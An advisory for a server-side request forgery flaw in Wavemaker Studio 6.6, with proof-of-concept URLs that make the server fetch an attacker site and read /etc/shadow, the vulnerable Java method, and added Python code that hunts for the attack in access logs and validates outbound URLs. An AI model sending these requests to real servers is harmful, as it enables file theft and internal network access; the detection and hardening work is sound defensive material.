Wavemaker Studio 6.6 – Server-Side Request Forgery

  • Author: Gionathan Reale
    Date: 2018-08-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45158/
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF)
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : CVE-2019-8982
     
# Description
# Wavemaker Studio 6.6 exposes studioService.download?method=getContent, whose inUrl
# parameter is fetched server-side without any validation of scheme or host and the
# fetched document is returned to the caller. An attacker can therefore send a victim a
# link that makes their own Wavemaker server fetch and serve attacker-controlled content,
# read local files through file:// URLs (with the privileges of the service account), or
# use the server as an HTTP proxy to reach hosts on its internal network.
     
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file:///etc/shadow
# (file:// reads run as the account the studio JVM runs under; /etc/shadow is readable only
#  if that account is root, so a world-readable file such as /etc/passwd confirms the read first)
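The PoC URLs above are also what a defender should hunt for. The following is an added example (not part of the exploit-db entry and not WaveMaker code) that scans web-server access logs for calls to the getContent endpoint and grades each inUrl target. The endpoint path and parameter names are taken from the advisory; the log lines are constructed in combined-log format, and the severity mapping is an assumption to tune per environment.

```python
"""
Detection over access logs for the WaveMaker getContent SSRF.

Added example; not WaveMaker or exploit-db code. Endpoint path and the
method=getContent&inUrl= parameters come from the advisory; SAMPLE_LOG is
constructed, and the severity levels are an assumed policy.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

SINK_PATH = "/wavemaker/studioService.download"

# Constructed sample: an external fetch, a file:// read, a cloud-metadata
# probe, a fetch of the vendor site, and one unrelated request.
SAMPLE_LOG = """\
203.0.113.9 - - [06/Aug/2018:10:00:01 +0000] "GET /wavemaker/studioService.download?method=getContent&inUrl=http%3A%2F%2Fattackersite.com%2F HTTP/1.1" 200 512
203.0.113.9 - - [06/Aug/2018:10:00:02 +0000] "GET /wavemaker/studioService.download?method=getContent&inUrl=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1287
203.0.113.9 - - [06/Aug/2018:10:00:03 +0000] "GET /wavemaker/studioService.download?method=getContent&inUrl=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 298
198.51.100.4 - - [06/Aug/2018:10:00:04 +0000] "GET /wavemaker/studioService.download?method=getContent&inUrl=http%3A%2F%2Fwww.wavemaker.com%2F HTTP/1.1" 200 9000
198.51.100.4 - - [06/Aug/2018:10:00:05 +0000] "GET /wavemaker/index.html HTTP/1.1" 200 4000
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_in_url(in_url):
    """Map a decoded inUrl value to (severity, reason)."""
    parts = urlsplit(in_url)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        # file://, jar://, ftp:// and a missing scheme all mean a non-web fetch
        return "high", f"non-http scheme {scheme or '(none)'!r}"
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname: not resolved here (that would leak the hunt to DNS),
        # so it is recorded as proxy-style external fetching only.
        return "medium", f"external fetch of {host!r}"
    if (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast):
        return "high", f"internal target {ip}"
    return "medium", f"external fetch of {ip}"


def scan_log(text):
    """Return one finding dict per getContent request found in `text`."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        if target.path != SINK_PATH:
            continue
        qs = parse_qs(target.query)
        if qs.get("method", [""])[0] != "getContent" or "inUrl" not in qs:
            continue
        in_url = qs["inUrl"][0]  # parse_qs already percent-decodes
        severity, reason = classify_in_url(in_url)
        findings.append({"src": m["src"], "ts": m["ts"], "status": m["status"],
                         "inUrl": in_url, "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']:14} {f['reason']}  [{f['inUrl']}]")
```

Every hit on the endpoint is recorded because the proxy case (a public hostname) is legitimate only for the studio's own browsing; the file:// and internal-address cases are the high-confidence signals. Hostnames are deliberately not resolved during the hunt.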
    
# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java

# Line 419-430
@ExposeToClient
public String getContent(String inUrl) throws IOException {
    try {
        String str = getRemoteContent(inUrl);
        str = str.replace("<head>", "<head><base href='" + inUrl
                + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
        return str;
    } catch (Exception e) {
        return "";
    }
}
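getContent passes inUrl straight to getRemoteContent, so any scheme and any host the JVM can reach is fair game. The following is an added example of the check that is missing, written in Python rather than the project's Java; it is not WaveMaker code and not the vendor's fix. Its policy choices are assumptions: http/https only, no userinfo, no destination in a set of blocked internal ranges, redirects refused, and every resolved address (not just the first) checked. The `resolve` parameter is injectable so the policy can be exercised offline against a constructed lookup table.

```python
"""
Hardened counterpart to the vulnerable getContent(inUrl) pattern.

Added example, not WaveMaker code. Policy (assumed): http/https only, no
userinfo, no blocked destination, redirects not followed. `resolve` is
injectable so the policy is testable without live DNS.
"""
import ipaddress
import socket
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Ranges a server-side fetcher must never reach on a browser's behalf:
# loopback, RFC 1918, link-local (cloud metadata at 169.254.169.254),
# CGNAT, multicast, and the IPv6 / IPv4-mapped equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]


class SsrfRejected(ValueError):
    """The URL violates the outbound-fetch policy."""


def live_resolve(host):
    """Resolve `host` to every A/AAAA address via the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return {info[4][0] for info in infos}


# Constructed lookup table standing in for DNS in the offline demonstration.
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "rebind.test": {"93.184.216.34", "10.0.0.5"},  # public + private answer
    "nx.test": set(),
}


def table_resolve(host):
    return FAKE_DNS.get(host, set())


def validate_outbound_url(url, resolve=live_resolve):
    """Return (host, sorted ips) if `url` may be fetched, else raise SsrfRejected.

    Every resolved address must be outside BLOCKED_NETWORKS; a name answering
    with one public and one private address is rejected outright.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise SsrfRejected(f"scheme not allowed: {parts.scheme or '(none)'!r}")
    if parts.username is not None or parts.password is not None:
        raise SsrfRejected("userinfo in URL")
    host = parts.hostname
    if not host:
        raise SsrfRejected("missing host")
    try:
        ips = {str(ipaddress.ip_address(host))}  # literal address, no lookup
    except ValueError:
        try:
            ips = set(resolve(host))
        except OSError as exc:  # getaddrinfo failure
            raise SsrfRejected(f"resolution failed: {exc}") from None
        if not ips:
            raise SsrfRejected(f"{host!r} did not resolve")
    for ip in ips:
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in BLOCKED_NETWORKS):
            raise SsrfRejected(f"{host!r} resolves to blocked address {ip}")
    return host, sorted(ips)


def verdict(url, resolve=live_resolve):
    """String form of the decision, convenient for logging and tests."""
    try:
        host, ips = validate_outbound_url(url, resolve)
        return f"allowed: {host} -> {','.join(ips)}"
    except SsrfRejected as exc:
        return f"rejected: {exc}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx as an error: a redirect could point back at an internal host."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_checked(url, timeout=5):
    """Fetch `url` only after it passes the policy, with live DNS and no redirects."""
    validate_outbound_url(url)
    opener = urllib.request.build_opener(_NoRedirect())
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()
```

One caveat remains in fetch_checked: the HTTP client resolves the name again when it connects, so a resolver that changes its answer between the check and the connect (classic DNS rebinding) still slips through. Closing that requires connecting to the validated IP and setting Host and SNI yourself, which is the trade-off an allowlist of known hosts avoids entirely.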